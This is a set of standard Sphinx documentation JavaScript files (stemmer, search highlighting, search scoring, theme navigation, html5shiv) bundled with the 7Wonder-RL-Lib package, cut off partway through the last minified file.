re = new RegExp(mgr0);
if (re.test(stem))
w = stem + step2list[suffix];
}
// Step 3
re = /^(.+?)(icate|ative|alize|iciti|ical|ful|ness)$/;
if (re.test(w)) {
var fp = re.exec(w);
stem = fp[1];
suffix = fp[2];
re = new RegExp(mgr0);
if (re.test(stem))
w = stem + step3list[suffix];
}
// Step 4
re = /^(.+?)(al|ance|ence|er|ic|able|ible|ant|ement|ment|ent|ou|ism|ate|iti|ous|ive|ize)$/;
re2 = /^(.+?)(s|t)(ion)$/;
if (re.test(w)) {
var fp = re.exec(w);
stem = fp[1];
re = new RegExp(mgr1);
if (re.test(stem))
w = stem;
}
else if (re2.test(w)) {
var fp = re2.exec(w);
stem = fp[1] + fp[2];
re2 = new RegExp(mgr1);
if (re2.test(stem))
w = stem;
}
// Step 5
re = /^(.+?)e$/;
if (re.test(w)) {
var fp = re.exec(w);
stem = fp[1];
re = new RegExp(mgr1);
re2 = new RegExp(meq1);
re3 = new RegExp("^" + C + v + "[^aeiouwxy]$");
if (re.test(stem) || (re2.test(stem) && !(re3.test(stem))))
w = stem;
}
re = /ll$/;
re2 = new RegExp(mgr1);
if (re.test(w) && re2.test(w)) {
re = /.$/;
w = w.replace(re,"");
}
// and turn initial Y back to y
if (firstch == "y")
w = firstch.toLowerCase() + w.substr(1);
return w;
}
} | 7Wonder-RL-Lib | /7Wonder-RL-Lib-0.1.1.tar.gz/7Wonder-RL-Lib-0.1.1/docs/_static/language_data.js | language_data.js |
"use strict";
const SPHINX_HIGHLIGHT_ENABLED = true
/**
* highlight a given string on a node by wrapping it in
* span elements with the given class name.
*/
const _highlight = (node, addItems, text, className) => {
if (node.nodeType === Node.TEXT_NODE) {
const val = node.nodeValue;
const parent = node.parentNode;
const pos = val.toLowerCase().indexOf(text);
if (
pos >= 0 &&
!parent.classList.contains(className) &&
!parent.classList.contains("nohighlight")
) {
let span;
const closestNode = parent.closest("body, svg, foreignObject");
const isInSVG = closestNode && closestNode.matches("svg");
if (isInSVG) {
span = document.createElementNS("http://www.w3.org/2000/svg", "tspan");
} else {
span = document.createElement("span");
span.classList.add(className);
}
span.appendChild(document.createTextNode(val.substr(pos, text.length)));
parent.insertBefore(
span,
parent.insertBefore(
document.createTextNode(val.substr(pos + text.length)),
node.nextSibling
)
);
node.nodeValue = val.substr(0, pos);
if (isInSVG) {
const rect = document.createElementNS(
"http://www.w3.org/2000/svg",
"rect"
);
const bbox = parent.getBBox();
rect.x.baseVal.value = bbox.x;
rect.y.baseVal.value = bbox.y;
rect.width.baseVal.value = bbox.width;
rect.height.baseVal.value = bbox.height;
rect.setAttribute("class", className);
addItems.push({ parent: parent, target: rect });
}
}
} else if (node.matches && !node.matches("button, select, textarea")) {
node.childNodes.forEach((el) => _highlight(el, addItems, text, className));
}
};
const _highlightText = (thisNode, text, className) => {
let addItems = [];
_highlight(thisNode, addItems, text, className);
addItems.forEach((obj) =>
obj.parent.insertAdjacentElement("beforebegin", obj.target)
);
};
/**
* Small JavaScript module for the documentation.
*/
const SphinxHighlight = {
/**
* highlight the search words provided in localstorage in the text
*/
highlightSearchWords: () => {
if (!SPHINX_HIGHLIGHT_ENABLED) return; // bail if no highlight
// get and clear terms from localstorage
const url = new URL(window.location);
const highlight =
localStorage.getItem("sphinx_highlight_terms")
|| url.searchParams.get("highlight")
|| "";
localStorage.removeItem("sphinx_highlight_terms")
url.searchParams.delete("highlight");
window.history.replaceState({}, "", url);
// get individual terms from highlight string
const terms = highlight.toLowerCase().split(/\s+/).filter(x => x);
if (terms.length === 0) return; // nothing to do
// There should never be more than one element matching "div.body"
const divBody = document.querySelectorAll("div.body");
const body = divBody.length ? divBody[0] : document.querySelector("body");
window.setTimeout(() => {
terms.forEach((term) => _highlightText(body, term, "highlighted"));
}, 10);
const searchBox = document.getElementById("searchbox");
if (searchBox === null) return;
searchBox.appendChild(
document
.createRange()
.createContextualFragment(
'<p class="highlight-link">' +
'<a href="javascript:SphinxHighlight.hideSearchWords()">' +
_("Hide Search Matches") +
"</a></p>"
)
);
},
/**
* helper function to hide the search marks again
*/
hideSearchWords: () => {
document
.querySelectorAll("#searchbox .highlight-link")
.forEach((el) => el.remove());
document
.querySelectorAll("span.highlighted")
.forEach((el) => el.classList.remove("highlighted"));
localStorage.removeItem("sphinx_highlight_terms")
},
initEscapeListener: () => {
// only install a listener if it is really needed
if (!DOCUMENTATION_OPTIONS.ENABLE_SEARCH_SHORTCUTS) return;
document.addEventListener("keydown", (event) => {
// bail for input elements
if (BLACKLISTED_KEY_CONTROL_ELEMENTS.has(document.activeElement.tagName)) return;
// bail with special keys
if (event.shiftKey || event.altKey || event.ctrlKey || event.metaKey) return;
if (DOCUMENTATION_OPTIONS.ENABLE_SEARCH_SHORTCUTS && (event.key === "Escape")) {
SphinxHighlight.hideSearchWords();
event.preventDefault();
}
});
},
};
_ready(SphinxHighlight.highlightSearchWords);
_ready(SphinxHighlight.initEscapeListener); | 7Wonder-RL-Lib | /7Wonder-RL-Lib-0.1.1.tar.gz/7Wonder-RL-Lib-0.1.1/docs/_static/sphinx_highlight.js | sphinx_highlight.js |
"use strict";
/**
* Simple result scoring code.
*/
if (typeof Scorer === "undefined") {
var Scorer = {
// Implement the following function to further tweak the score for each result
// The function takes a result array [docname, title, anchor, descr, score, filename]
// and returns the new score.
/*
score: result => {
const [docname, title, anchor, descr, score, filename] = result
return score
},
*/
// query matches the full name of an object
objNameMatch: 11,
// or matches in the last dotted part of the object name
objPartialMatch: 6,
// Additive scores depending on the priority of the object
objPrio: {
0: 15, // used to be importantResults
1: 5, // used to be objectResults
2: -5, // used to be unimportantResults
},
// Used when the priority is not in the mapping.
objPrioDefault: 0,
// query found in title
title: 15,
partialTitle: 7,
// query found in terms
term: 5,
partialTerm: 2,
};
}
const _removeChildren = (element) => {
while (element && element.lastChild) element.removeChild(element.lastChild);
};
/**
* See https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions#escaping
*/
const _escapeRegExp = (string) =>
string.replace(/[.*+\-?^${}()|[\]\\]/g, "\\$&"); // $& means the whole matched string
const _displayItem = (item, searchTerms) => {
const docBuilder = DOCUMENTATION_OPTIONS.BUILDER;
const docUrlRoot = DOCUMENTATION_OPTIONS.URL_ROOT;
const docFileSuffix = DOCUMENTATION_OPTIONS.FILE_SUFFIX;
const docLinkSuffix = DOCUMENTATION_OPTIONS.LINK_SUFFIX;
const showSearchSummary = DOCUMENTATION_OPTIONS.SHOW_SEARCH_SUMMARY;
const [docName, title, anchor, descr, score, _filename] = item;
let listItem = document.createElement("li");
let requestUrl;
let linkUrl;
if (docBuilder === "dirhtml") {
// dirhtml builder
let dirname = docName + "/";
if (dirname.match(/\/index\/$/))
dirname = dirname.substring(0, dirname.length - 6);
else if (dirname === "index/") dirname = "";
requestUrl = docUrlRoot + dirname;
linkUrl = requestUrl;
} else {
// normal html builders
requestUrl = docUrlRoot + docName + docFileSuffix;
linkUrl = docName + docLinkSuffix;
}
let linkEl = listItem.appendChild(document.createElement("a"));
linkEl.href = linkUrl + anchor;
linkEl.dataset.score = score;
linkEl.innerHTML = title;
if (descr)
listItem.appendChild(document.createElement("span")).innerHTML =
" (" + descr + ")";
else if (showSearchSummary)
fetch(requestUrl)
.then((responseData) => responseData.text())
.then((data) => {
if (data)
listItem.appendChild(
Search.makeSearchSummary(data, searchTerms)
);
});
Search.output.appendChild(listItem);
};
const _finishSearch = (resultCount) => {
Search.stopPulse();
Search.title.innerText = _("Search Results");
if (!resultCount)
Search.status.innerText = Documentation.gettext(
"Your search did not match any documents. Please make sure that all words are spelled correctly and that you've selected enough categories."
);
else
Search.status.innerText = _(
`Search finished, found ${resultCount} page(s) matching the search query.`
);
};
const _displayNextItem = (
results,
resultCount,
searchTerms
) => {
// results left, load the summary and display it
// this is intended to be dynamic (don't sub resultsCount)
if (results.length) {
_displayItem(results.pop(), searchTerms);
setTimeout(
() => _displayNextItem(results, resultCount, searchTerms),
5
);
}
// search finished, update title and status message
else _finishSearch(resultCount);
};
/**
* Default splitQuery function. Can be overridden in ``sphinx.search`` with a
* custom function per language.
*
* The regular expression works by splitting the string on consecutive characters
* that are not Unicode letters, numbers, underscores, or emoji characters.
* This is the same as ``\W+`` in Python, preserving the surrogate pair area.
*/
if (typeof splitQuery === "undefined") {
var splitQuery = (query) => query
.split(/[^\p{Letter}\p{Number}_\p{Emoji_Presentation}]+/gu)
.filter(term => term) // remove remaining empty strings
}
/**
* Search Module
*/
const Search = {
_index: null,
_queued_query: null,
_pulse_status: -1,
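  /** Strip a rendered HTML page down to the plain text of its main content block. */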
htmlToText: (htmlString) => {
const htmlElement = new DOMParser().parseFromString(htmlString, 'text/html');
htmlElement.querySelectorAll(".headerlink").forEach((el) => { el.remove() });
const docContent = htmlElement.querySelector('[role="main"]');
    if (docContent !== null) return docContent.textContent;  // querySelector returns null, not undefined
    console.warn(
      "Content block not found. Sphinx search tries to obtain it via '[role=main]'. Check your theme or template."
);
return "";
},
init: () => {
const query = new URLSearchParams(window.location.search).get("q");
document
.querySelectorAll('input[name="q"]')
.forEach((el) => (el.value = query));
if (query) Search.performSearch(query);
},
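  /** Load the search index by injecting a script tag; the loaded file is expected to call Search.setIndex(). */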
loadIndex: (url) =>
(document.body.appendChild(document.createElement("script")).src = url),
setIndex: (index) => {
Search._index = index;
if (Search._queued_query !== null) {
const query = Search._queued_query;
Search._queued_query = null;
Search.query(query);
}
},
hasIndex: () => Search._index !== null,
deferQuery: (query) => (Search._queued_query = query),
stopPulse: () => (Search._pulse_status = -1),
startPulse: () => {
if (Search._pulse_status >= 0) return;
const pulse = () => {
Search._pulse_status = (Search._pulse_status + 1) % 4;
Search.dots.innerText = ".".repeat(Search._pulse_status);
if (Search._pulse_status >= 0) window.setTimeout(pulse, 500);
};
pulse();
},
/**
* perform a search for something (or wait until index is loaded)
*/
performSearch: (query) => {
// create the required interface elements
const searchText = document.createElement("h2");
searchText.textContent = _("Searching");
const searchSummary = document.createElement("p");
searchSummary.classList.add("search-summary");
searchSummary.innerText = "";
const searchList = document.createElement("ul");
searchList.classList.add("search");
const out = document.getElementById("search-results");
Search.title = out.appendChild(searchText);
Search.dots = Search.title.appendChild(document.createElement("span"));
Search.status = out.appendChild(searchSummary);
Search.output = out.appendChild(searchList);
const searchProgress = document.getElementById("search-progress");
// Some themes don't use the search progress node
if (searchProgress) {
searchProgress.innerText = _("Preparing search...");
}
Search.startPulse();
// index already loaded, the browser was quick!
if (Search.hasIndex()) Search.query(query);
else Search.deferQuery(query);
},
/**
* execute search (requires search index to be loaded)
*/
query: (query) => {
const filenames = Search._index.filenames;
const docNames = Search._index.docnames;
const titles = Search._index.titles;
const allTitles = Search._index.alltitles;
const indexEntries = Search._index.indexentries;
// stem the search terms and add them to the correct list
const stemmer = new Stemmer();
const searchTerms = new Set();
const excludedTerms = new Set();
const highlightTerms = new Set();
const objectTerms = new Set(splitQuery(query.toLowerCase().trim()));
splitQuery(query.trim()).forEach((queryTerm) => {
const queryTermLower = queryTerm.toLowerCase();
// maybe skip this "word"
// stopwords array is from language_data.js
if (
stopwords.indexOf(queryTermLower) !== -1 ||
queryTerm.match(/^\d+$/)
)
return;
// stem the word
let word = stemmer.stemWord(queryTermLower);
// select the correct list
if (word[0] === "-") excludedTerms.add(word.substr(1));
else {
searchTerms.add(word);
highlightTerms.add(queryTermLower);
}
});
if (SPHINX_HIGHLIGHT_ENABLED) { // set in sphinx_highlight.js
localStorage.setItem("sphinx_highlight_terms", [...highlightTerms].join(" "))
}
// console.debug("SEARCH: searching for:");
// console.info("required: ", [...searchTerms]);
// console.info("excluded: ", [...excludedTerms]);
// array of [docname, title, anchor, descr, score, filename]
let results = [];
_removeChildren(document.getElementById("search-progress"));
const queryLower = query.toLowerCase();
for (const [title, foundTitles] of Object.entries(allTitles)) {
if (title.toLowerCase().includes(queryLower) && (queryLower.length >= title.length/2)) {
for (const [file, id] of foundTitles) {
let score = Math.round(100 * queryLower.length / title.length)
results.push([
docNames[file],
titles[file] !== title ? `${titles[file]} > ${title}` : title,
id !== null ? "#" + id : "",
null,
score,
filenames[file],
]);
}
}
}
// search for explicit entries in index directives
for (const [entry, foundEntries] of Object.entries(indexEntries)) {
if (entry.includes(queryLower) && (queryLower.length >= entry.length/2)) {
for (const [file, id] of foundEntries) {
let score = Math.round(100 * queryLower.length / entry.length)
results.push([
docNames[file],
titles[file],
id ? "#" + id : "",
null,
score,
filenames[file],
]);
}
}
}
// lookup as object
objectTerms.forEach((term) =>
results.push(...Search.performObjectSearch(term, objectTerms))
);
// lookup as search terms in fulltext
results.push(...Search.performTermsSearch(searchTerms, excludedTerms));
// let the scorer override scores with a custom scoring function
if (Scorer.score) results.forEach((item) => (item[4] = Scorer.score(item)));
// now sort the results by score (in opposite order of appearance, since the
// display function below uses pop() to retrieve items) and then
// alphabetically
results.sort((a, b) => {
const leftScore = a[4];
const rightScore = b[4];
if (leftScore === rightScore) {
// same score: sort alphabetically
const leftTitle = a[1].toLowerCase();
const rightTitle = b[1].toLowerCase();
if (leftTitle === rightTitle) return 0;
return leftTitle > rightTitle ? -1 : 1; // inverted is intentional
}
return leftScore > rightScore ? 1 : -1;
});
// remove duplicate search results
// note the reversing of results, so that in the case of duplicates, the highest-scoring entry is kept
let seen = new Set();
results = results.reverse().reduce((acc, result) => {
let resultStr = result.slice(0, 4).concat([result[5]]).map(v => String(v)).join(',');
if (!seen.has(resultStr)) {
acc.push(result);
seen.add(resultStr);
}
return acc;
}, []);
results = results.reverse();
// for debugging
//Search.lastresults = results.slice(); // a copy
// console.info("search results:", Search.lastresults);
// print the results
_displayNextItem(results, results.length, searchTerms);
},
/**
* search for object names
*/
performObjectSearch: (object, objectTerms) => {
const filenames = Search._index.filenames;
const docNames = Search._index.docnames;
const objects = Search._index.objects;
const objNames = Search._index.objnames;
const titles = Search._index.titles;
const results = [];
const objectSearchCallback = (prefix, match) => {
const name = match[4]
const fullname = (prefix ? prefix + "." : "") + name;
const fullnameLower = fullname.toLowerCase();
if (fullnameLower.indexOf(object) < 0) return;
let score = 0;
const parts = fullnameLower.split(".");
// check for different match types: exact matches of full name or
// "last name" (i.e. last dotted part)
if (fullnameLower === object || parts.slice(-1)[0] === object)
score += Scorer.objNameMatch;
else if (parts.slice(-1)[0].indexOf(object) > -1)
score += Scorer.objPartialMatch; // matches in last name
const objName = objNames[match[1]][2];
const title = titles[match[0]];
// If more than one term searched for, we require other words to be
// found in the name/title/description
const otherTerms = new Set(objectTerms);
otherTerms.delete(object);
if (otherTerms.size > 0) {
const haystack = `${prefix} ${name} ${objName} ${title}`.toLowerCase();
if (
[...otherTerms].some((otherTerm) => haystack.indexOf(otherTerm) < 0)
)
return;
}
let anchor = match[3];
if (anchor === "") anchor = fullname;
else if (anchor === "-") anchor = objNames[match[1]][1] + "-" + fullname;
const descr = objName + _(", in ") + title;
// add custom score for some objects according to scorer
if (Scorer.objPrio.hasOwnProperty(match[2]))
score += Scorer.objPrio[match[2]];
else score += Scorer.objPrioDefault;
results.push([
docNames[match[0]],
fullname,
"#" + anchor,
descr,
score,
filenames[match[0]],
]);
};
Object.keys(objects).forEach((prefix) =>
objects[prefix].forEach((array) =>
objectSearchCallback(prefix, array)
)
);
return results;
},
/**
* search for full-text terms in the index
*/
performTermsSearch: (searchTerms, excludedTerms) => {
// prepare search
const terms = Search._index.terms;
const titleTerms = Search._index.titleterms;
const filenames = Search._index.filenames;
const docNames = Search._index.docnames;
const titles = Search._index.titles;
const scoreMap = new Map();
const fileMap = new Map();
// perform the search on the required terms
searchTerms.forEach((word) => {
const files = [];
const arr = [
{ files: terms[word], score: Scorer.term },
{ files: titleTerms[word], score: Scorer.title },
];
// add support for partial matches
if (word.length > 2) {
const escapedWord = _escapeRegExp(word);
Object.keys(terms).forEach((term) => {
if (term.match(escapedWord) && !terms[word])
arr.push({ files: terms[term], score: Scorer.partialTerm });
});
Object.keys(titleTerms).forEach((term) => {
if (term.match(escapedWord) && !titleTerms[word])
          arr.push({ files: titleTerms[term], score: Scorer.partialTitle });
});
}
// no match but word was a required one
if (arr.every((record) => record.files === undefined)) return;
// found search word in contents
arr.forEach((record) => {
if (record.files === undefined) return;
let recordFiles = record.files;
if (recordFiles.length === undefined) recordFiles = [recordFiles];
files.push(...recordFiles);
// set score for the word in each file
recordFiles.forEach((file) => {
if (!scoreMap.has(file)) scoreMap.set(file, {});
scoreMap.get(file)[word] = record.score;
});
});
// create the mapping
files.forEach((file) => {
if (fileMap.has(file) && fileMap.get(file).indexOf(word) === -1)
fileMap.get(file).push(word);
else fileMap.set(file, [word]);
});
});
// now check if the files don't contain excluded terms
const results = [];
for (const [file, wordList] of fileMap) {
// check if all requirements are matched
// as search terms with length < 3 are discarded
const filteredTermCount = [...searchTerms].filter(
(term) => term.length > 2
).length;
if (
wordList.length !== searchTerms.size &&
wordList.length !== filteredTermCount
)
continue;
// ensure that none of the excluded terms is in the search result
if (
[...excludedTerms].some(
(term) =>
terms[term] === file ||
titleTerms[term] === file ||
(terms[term] || []).includes(file) ||
(titleTerms[term] || []).includes(file)
)
)
break;
// select one (max) score for the file.
const score = Math.max(...wordList.map((w) => scoreMap.get(file)[w]));
// add result to the result list
results.push([
docNames[file],
titles[file],
"",
null,
score,
filenames[file],
]);
}
return results;
},
/**
* helper function to return a node containing the
* search summary for a given text. keywords is a list
* of stemmed words.
*/
makeSearchSummary: (htmlText, keywords) => {
const text = Search.htmlToText(htmlText);
if (text === "") return null;
const textLower = text.toLowerCase();
const actualStartPosition = [...keywords]
.map((k) => textLower.indexOf(k.toLowerCase()))
.filter((i) => i > -1)
.slice(-1)[0];
const startWithContext = Math.max(actualStartPosition - 120, 0);
const top = startWithContext === 0 ? "" : "...";
const tail = startWithContext + 240 < text.length ? "..." : "";
let summary = document.createElement("p");
summary.classList.add("context");
summary.textContent = top + text.substr(startWithContext, 240).trim() + tail;
return summary;
},
};
_ready(Search.init); | 7Wonder-RL-Lib | /7Wonder-RL-Lib-0.1.1.tar.gz/7Wonder-RL-Lib-0.1.1/docs/_static/searchtools.js | searchtools.js |
!function(n){var e={};function t(i){if(e[i])return e[i].exports;var o=e[i]={i:i,l:!1,exports:{}};return n[i].call(o.exports,o,o.exports,t),o.l=!0,o.exports}t.m=n,t.c=e,t.d=function(n,e,i){t.o(n,e)||Object.defineProperty(n,e,{enumerable:!0,get:i})},t.r=function(n){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(n,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(n,"__esModule",{value:!0})},t.t=function(n,e){if(1&e&&(n=t(n)),8&e)return n;if(4&e&&"object"==typeof n&&n&&n.__esModule)return n;var i=Object.create(null);if(t.r(i),Object.defineProperty(i,"default",{enumerable:!0,value:n}),2&e&&"string"!=typeof n)for(var o in n)t.d(i,o,function(e){return n[e]}.bind(null,o));return i},t.n=function(n){var e=n&&n.__esModule?function(){return n.default}:function(){return n};return t.d(e,"a",e),e},t.o=function(n,e){return Object.prototype.hasOwnProperty.call(n,e)},t.p="",t(t.s=0)}([function(n,e,t){t(1),n.exports=t(3)},function(n,e,t){(function(){var e="undefined"!=typeof window?window.jQuery:t(2);n.exports.ThemeNav={navBar:null,win:null,winScroll:!1,winResize:!1,linkScroll:!1,winPosition:0,winHeight:null,docHeight:null,isRunning:!1,enable:function(n){var t=this;void 0===n&&(n=!0),t.isRunning||(t.isRunning=!0,e((function(e){t.init(e),t.reset(),t.win.on("hashchange",t.reset),n&&t.win.on("scroll",(function(){t.linkScroll||t.winScroll||(t.winScroll=!0,requestAnimationFrame((function(){t.onScroll()})))})),t.win.on("resize",(function(){t.winResize||(t.winResize=!0,requestAnimationFrame((function(){t.onResize()})))})),t.onResize()})))},enableSticky:function(){this.enable(!0)},init:function(n){n(document);var e=this;this.navBar=n("div.wy-side-scroll:first"),this.win=n(window),n(document).on("click","[data-toggle='wy-nav-top']",(function(){n("[data-toggle='wy-nav-shift']").toggleClass("shift"),n("[data-toggle='rst-versions']").toggleClass("shift")})).on("click",".wy-menu-vertical .current ul li a",(function(){var t=n(this);n("[data-toggle='wy-nav-shift']").removeClass("shift"),n("[data-toggle='rst-versions']").toggleClass("shift"),e.toggleCurrent(t),e.hashChange()})).on("click","[data-toggle='rst-current-version']",(function(){n("[data-toggle='rst-versions']").toggleClass("shift-up")})),n("table.docutils:not(.field-list,.footnote,.citation)").wrap("<div class='wy-table-responsive'></div>"),n("table.docutils.footnote").wrap("<div class='wy-table-responsive footnote'></div>"),n("table.docutils.citation").wrap("<div class='wy-table-responsive citation'></div>"),n(".wy-menu-vertical ul").not(".simple").siblings("a").each((function(){var t=n(this);expand=n('<button class="toctree-expand" title="Open/close menu"></button>'),expand.on("click",(function(n){return e.toggleCurrent(t),n.stopPropagation(),!1})),t.prepend(expand)}))},reset:function(){var n=encodeURI(window.location.hash)||"#";try{var e=$(".wy-menu-vertical"),t=e.find('[href="'+n+'"]');if(0===t.length){var i=$('.document [id="'+n.substring(1)+'"]').closest("div.section");0===(t=e.find('[href="#'+i.attr("id")+'"]')).length&&(t=e.find('[href="#"]'))}if(t.length>0){$(".wy-menu-vertical .current").removeClass("current").attr("aria-expanded","false"),t.addClass("current").attr("aria-expanded","true"),t.closest("li.toctree-l1").parent().addClass("current").attr("aria-expanded","true");for(let n=1;n<=10;n++)t.closest("li.toctree-l"+n).addClass("current").attr("aria-expanded","true");t[0].scrollIntoView()}}catch(n){console.log("Error expanding nav for anchor",n)}},onScroll:function(){this.winScroll=!1;var 
n=this.win.scrollTop(),e=n+this.winHeight,t=this.navBar.scrollTop()+(n-this.winPosition);n<0||e>this.docHeight||(this.navBar.scrollTop(t),this.winPosition=n)},onResize:function(){this.winResize=!1,this.winHeight=this.win.height(),this.docHeight=$(document).height()},hashChange:function(){this.linkScroll=!0,this.win.one("hashchange",(function(){this.linkScroll=!1}))},toggleCurrent:function(n){var e=n.closest("li");e.siblings("li.current").removeClass("current").attr("aria-expanded","false"),e.siblings().find("li.current").removeClass("current").attr("aria-expanded","false");var t=e.find("> ul li");t.length&&(t.removeClass("current").attr("aria-expanded","false"),e.toggleClass("current").attr("aria-expanded",(function(n,e){return"true"==e?"false":"true"})))}},"undefined"!=typeof window&&(window.SphinxRtdTheme={Navigation:n.exports.ThemeNav,StickyNav:n.exports.ThemeNav}),function(){for(var n=0,e=["ms","moz","webkit","o"],t=0;t<e.length&&!window.requestAnimationFrame;++t)window.requestAnimationFrame=window[e[t]+"RequestAnimationFrame"],window.cancelAnimationFrame=window[e[t]+"CancelAnimationFrame"]||window[e[t]+"CancelRequestAnimationFrame"];window.requestAnimationFrame||(window.requestAnimationFrame=function(e,t){var i=(new Date).getTime(),o=Math.max(0,16-(i-n)),r=window.setTimeout((function(){e(i+o)}),o);return n=i+o,r}),window.cancelAnimationFrame||(window.cancelAnimationFrame=function(n){clearTimeout(n)})}()}).call(window)},function(n,e){n.exports=jQuery},function(n,e,t){}]); | 7Wonder-RL-Lib | /7Wonder-RL-Lib-0.1.1.tar.gz/7Wonder-RL-Lib-0.1.1/docs/_static/js/theme.js | theme.js |
!function(a,b){function c(a,b){var c=a.createElement("p"),d=a.getElementsByTagName("head")[0]||a.documentElement;return c.innerHTML="x<style>"+b+"</style>",d.insertBefore(c.lastChild,d.firstChild)}function d(){var a=y.elements;return"string"==typeof a?a.split(" "):a}function e(a,b){var c=y.elements;"string"!=typeof c&&(c=c.join(" ")),"string"!=typeof a&&(a=a.join(" ")),y.elements=c+" "+a,j(b)}function f(a){var b=x[a[v]];return b||(b={},w++,a[v]=w,x[w]=b),b}function g(a,c,d){if(c||(c=b),q)return c.createElement(a);d||(d=f(c));var e;return e=d.cache[a]?d.cache[a].cloneNode():u.test(a)?(d.cache[a]=d.createElem(a)).cloneNode():d.createElem(a),!e.canHaveChildren||t.test(a)||e.tagUrn?e:d.frag.appendChild(e)}function h(a,c){if(a||(a=b),q)return a.createDocumentFragment();c=c||f(a);for(var e=c.frag.cloneNode(),g=0,h=d(),i=h.length;i>g;g++)e.createElement(h[g]);return e}function i(a,b){b.cache||(b.cache={},b.createElem=a.createElement,b.createFrag=a.createDocumentFragment,b.frag=b.createFrag()),a.createElement=function(c){return y.shivMethods?g(c,a,b):b.createElem(c)},a.createDocumentFragment=Function("h,f","return function(){var n=f.cloneNode(),c=n.createElement;h.shivMethods&&("+d().join().replace(/[\w\-:]+/g,function(a){return b.createElem(a),b.frag.createElement(a),'c("'+a+'")'})+");return n}")(y,b.frag)}function j(a){a||(a=b);var d=f(a);return!y.shivCSS||p||d.hasCSS||(d.hasCSS=!!c(a,"article,aside,dialog,figcaption,figure,footer,header,hgroup,main,nav,section{display:block}mark{background:#FF0;color:#000}template{display:none}")),q||i(a,d),a}function k(a){for(var b,c=a.getElementsByTagName("*"),e=c.length,f=RegExp("^(?:"+d().join("|")+")$","i"),g=[];e--;)b=c[e],f.test(b.nodeName)&&g.push(b.applyElement(l(b)));return g}function l(a){for(var b,c=a.attributes,d=c.length,e=a.ownerDocument.createElement(A+":"+a.nodeName);d--;)b=c[d],b.specified&&e.setAttribute(b.nodeName,b.nodeValue);return e.style.cssText=a.style.cssText,e}function m(a){for(var b,c=a.split("{"),e=c.length,f=RegExp("(^|[\\s,>+~])("+d().join("|")+")(?=[[\\s,>+~#.:]|$)","gi"),g="$1"+A+"\\:$2";e--;)b=c[e]=c[e].split("}"),b[b.length-1]=b[b.length-1].replace(f,g),c[e]=b.join("}");return c.join("{")}function n(a){for(var b=a.length;b--;)a[b].removeNode()}function o(a){function b(){clearTimeout(g._removeSheetTimer),d&&d.removeNode(!0),d=null}var d,e,g=f(a),h=a.namespaces,i=a.parentWindow;return!B||a.printShived?a:("undefined"==typeof h[A]&&h.add(A),i.attachEvent("onbeforeprint",function(){b();for(var f,g,h,i=a.styleSheets,j=[],l=i.length,n=Array(l);l--;)n[l]=i[l];for(;h=n.pop();)if(!h.disabled&&z.test(h.media)){try{f=h.imports,g=f.length}catch(o){g=0}for(l=0;g>l;l++)n.push(f[l]);try{j.push(h.cssText)}catch(o){}}j=m(j.reverse().join("")),e=k(a),d=c(a,j)}),i.attachEvent("onafterprint",function(){n(e),clearTimeout(g._removeSheetTimer),g._removeSheetTimer=setTimeout(b,500)}),a.printShived=!0,a)}var p,q,r="3.7.3",s=a.html5||{},t=/^<|^(?:button|map|select|textarea|object|iframe|option|optgroup)$/i,u=/^(?:a|b|code|div|fieldset|h1|h2|h3|h4|h5|h6|i|label|li|ol|p|q|span|strong|style|table|tbody|td|th|tr|ul)$/i,v="_html5shiv",w=0,x={};!function(){try{var a=b.createElement("a");a.innerHTML="<xyz></xyz>",p="hidden"in a,q=1==a.childNodes.length||function(){b.createElement("a");var a=b.createDocumentFragment();return"undefined"==typeof a.cloneNode||"undefined"==typeof a.createDocumentFragment||"undefined"==typeof a.createElement}()}catch(c){p=!0,q=!0}}();var y={elements:s.elements||"abbr article aside audio bdi canvas data datalist details dialog 
figcaption figure footer header hgroup main mark meter nav output picture progress section summary template time video",version:r,shivCSS:s.shivCSS!==!1,supportsUnknownElements:q,shivMethods:s.shivMethods!==!1,type:"default",shivDocument:j,createElement:g,createDocumentFragment:h,addElements:e};a.html5=y,j(b);var z=/^$|\b(?:all|print)\b/,A="html5shiv",B=!q&&function(){var c=b.documentElement;return!("undefined"==typeof b.namespaces||"undefined"==typeof b.parentWindow||"undefined"==typeof c.applyElement||"undefined"==typeof c.removeNode||"undefined"==typeof a.attachEvent)}();y.type+=" print",y.shivPrint=o,o(b),"object"==typeof module&&module.exports&&(module.exports=y)}("undefined"!=typeof window?window:this,document); | 7Wonder-RL-Lib | /7Wonder-RL-Lib-0.1.1.tar.gz/7Wonder-RL-Lib-0.1.1/docs/_static/js/html5shiv-printshiv.min.js | html5shiv-printshiv.min.js |
!function(a,b){function c(a,b){var c=a.createElement("p"),d=a.getElementsByTagName("head")[0]||a.documentElement;return c.innerHTML="x<style>"+b+"</style>",d.insertBefore(c.lastChild,d.firstChild)}function d(){var a=t.elements;return"string"==typeof a?a.split(" "):a}function e(a,b){var c=t.elements;"string"!=typeof c&&(c=c.join(" ")),"string"!=typeof a&&(a=a.join(" ")),t.elements=c+" "+a,j(b)}function f(a){var b=s[a[q]];return b||(b={},r++,a[q]=r,s[r]=b),b}function g(a,c,d){if(c||(c=b),l)return c.createElement(a);d||(d=f(c));var e;return e=d.cache[a]?d.cache[a].cloneNode():p.test(a)?(d.cache[a]=d.createElem(a)).cloneNode():d.createElem(a),!e.canHaveChildren||o.test(a)||e.tagUrn?e:d.frag.appendChild(e)}function h(a,c){if(a||(a=b),l)return a.createDocumentFragment();c=c||f(a);for(var e=c.frag.cloneNode(),g=0,h=d(),i=h.length;i>g;g++)e.createElement(h[g]);return e}function i(a,b){b.cache||(b.cache={},b.createElem=a.createElement,b.createFrag=a.createDocumentFragment,b.frag=b.createFrag()),a.createElement=function(c){return t.shivMethods?g(c,a,b):b.createElem(c)},a.createDocumentFragment=Function("h,f","return function(){var n=f.cloneNode(),c=n.createElement;h.shivMethods&&("+d().join().replace(/[\w\-:]+/g,function(a){return b.createElem(a),b.frag.createElement(a),'c("'+a+'")'})+");return n}")(t,b.frag)}function j(a){a||(a=b);var d=f(a);return!t.shivCSS||k||d.hasCSS||(d.hasCSS=!!c(a,"article,aside,dialog,figcaption,figure,footer,header,hgroup,main,nav,section{display:block}mark{background:#FF0;color:#000}template{display:none}")),l||i(a,d),a}var 